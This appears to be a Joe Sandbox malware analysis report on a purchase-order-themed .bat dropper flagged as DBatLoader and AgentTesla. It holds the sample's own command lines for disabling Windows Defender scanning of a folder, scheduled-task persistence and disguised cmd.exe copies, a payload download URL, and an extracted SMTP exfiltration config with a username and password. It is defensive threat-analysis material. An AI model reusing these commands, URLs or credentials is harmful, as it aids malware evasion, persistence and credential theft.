Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat

Overview

General Information

Sample name:RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat
Analysis ID:1560318
MD5:ae6a8a43561ba85215f8b9986001a520
SHA1:08d50775b58ae5f13b971a674e7799477a5bd00c
SHA256:a0b4998d451f008fd7f752ef86b9a7306684f9193f07db1986273727636da61e
Tags:batuser-lowmal3
Infos:

Detection

AgentTesla, DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected DBatLoader
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates many large memory junks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found large BAT file
Infects executable files (exe, dll, sys, html)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 7972 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • conhost.exe (PID: 3496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 8060 cmdline: extrac32 /y "C:\Users\user\Desktop\RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat" "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • x.exe (PID: 8084 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 67DAC6AE9EE770115DB85CC71979DC41)
      • cmd.exe (PID: 7396 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • esentutl.exe (PID: 7564 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
        • esentutl.exe (PID: 7628 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • esentutl.exe (PID: 7752 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
        • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • lxsyrsiW.pif (PID: 3192 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)
        • neworigin.exe (PID: 6424 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)
        • server_BTC.exe (PID: 5868 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
          • powershell.exe (PID: 5836 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 2044 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • schtasks.exe (PID: 2572 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:05 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • TrojanAIbot.exe (PID: 8152 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
          • cmd.exe (PID: 6660 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFF65.tmp.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 5480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • timeout.exe (PID: 748 cmdline: timeout 6 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • TrojanAIbot.exe (PID: 1204 cmdline: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe MD5: 50D015016F20DA0905FD5B37D7834823)
  • Wisrysxl.PIF (PID: 4024 cmdline: "C:\Users\Public\Libraries\Wisrysxl.PIF" MD5: 67DAC6AE9EE770115DB85CC71979DC41)
    • lxsyrsiW.pif (PID: 4688 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • neworigin.exe (PID: 5072 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)
      • server_BTC.exe (PID: 4912 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
  • Wisrysxl.PIF (PID: 8088 cmdline: "C:\Users\Public\Libraries\Wisrysxl.PIF" MD5: 67DAC6AE9EE770115DB85CC71979DC41)
    • lxsyrsiW.pif (PID: 1056 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • neworigin.exe (PID: 6344 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)
      • server_BTC.exe (PID: 1812 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
  • TrojanAIbot.exe (PID: 7832 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
{"Download Url": ["https://gxe0.com/yak/233_Wisrysxlfss"]}
{"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\neworigin.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    C:\Users\user\AppData\Local\Temp\neworigin.exeJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      C:\Users\user\AppData\Local\Temp\neworigin.exeINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
      • 0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
      • 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
      • 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
      • 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
      • 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
      • 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
      • 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
      • 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
      SourceRuleDescriptionAuthorStrings
      0000000D.00000002.1624352397.0000000002DBB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000D.00000002.1624352397.0000000002DCE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              00000004.00000003.1329954497.000000007FC50000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
                Click to see the 8 entries
                SourceRuleDescriptionAuthorStrings
                4.2.x.exe.2e40000.2.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
                  13.0.neworigin.exe.a60000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    13.0.neworigin.exe.a60000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      13.0.neworigin.exe.a60000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                      • 0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                      • 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                      • 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                      • 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                      • 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                      • 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                      • 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                      • 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

                      System Summary

                      barindex
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 8084, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\lxsyrsiW.pif, NewProcessName: C:\Users\Public\Libraries\lxsyrsiW.pif, OriginalFileName: C:\Users\Public\Libraries\lxsyrsiW.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 8084, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, ProcessId: 3192, ProcessName: lxsyrsiW.pif
                      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Wisrysxl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 8084, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wisrysxl
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 5868, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 5836, ProcessName: powershell.exe
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Wisrysxl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 8084, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wisrysxl
                      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\lxsyrsiW.pif, NewProcessName: C:\Users\Public\Libraries\lxsyrsiW.pif, OriginalFileName: C:\Users\Public\Libraries\lxsyrsiW.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 8084, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, ProcessId: 3192, ProcessName: lxsyrsiW.pif
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 5868, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 5836, ProcessName: powershell.exe
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ProcessId: 5868, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:05 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:05 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 5868, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:05 /du 23:59 /sc daily /ri 1 /f, ProcessId: 2572, ProcessName: schtasks.exe
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\neworigin.exe, Initiated: true, ProcessId: 6424, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49749
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:05 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:05 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 5868, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:05 /du 23:59 /sc daily /ri 1 /f, ProcessId: 2572, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 5868, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 5836, ProcessName: powershell.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-21T17:00:13.455183+010020283713Unknown Traffic192.168.2.1049713198.252.105.91443TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeAvira: detection malicious, Label: HEUR/AGEN.1311721
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeAvira: detection malicious, Label: TR/Spy.Gen8
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFAvira: detection malicious, Label: HEUR/AGEN.1325995
                      Source: C:\Users\user\AppData\Local\Temp\x.exeAvira: detection malicious, Label: HEUR/AGEN.1325995
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeAvira: detection malicious, Label: HEUR/AGEN.1311721
                      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.batMalware Configuration Extractor: DBatLoader {"Download Url": ["https://gxe0.com/yak/233_Wisrysxlfss"]}
                      Source: 13.0.neworigin.exe.a60000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFReversingLabs: Detection: 28%
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeReversingLabs: Detection: 81%
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeReversingLabs: Detection: 65%
                      Source: C:\Users\user\AppData\Local\Temp\x.exeReversingLabs: Detection: 28%
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeReversingLabs: Detection: 65%
                      Source: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.batReversingLabs: Detection: 23%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeJoe Sandbox ML: detected
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\x.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
                      Source: unknownHTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.10:49713 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49742 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49775 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49797 version: TLS 1.2
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: x.exe, x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020D47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1329954497.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1472715771.00000000022E6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020CA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330431133.000000007F920000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000008.00000003.1441667884.0000000000AC0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000009.00000003.1445817918.0000000005170000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbH source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000002.1474717040.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1446636535.000000002212F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1446636535.00000000220FE000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020D47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330164805.00000000028C9000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1329954497.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1472715771.00000000022E6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020CA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330431133.000000007F920000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdb source: esentutl.exe, 00000008.00000003.1441667884.0000000000AC0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ping.pdb source: esentutl.exe, 00000009.00000003.1445817918.0000000005170000.00000004.00001000.00020000.00000000.sdmp

                      Spreading

                      barindex
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E45908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,4_2_02E45908
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
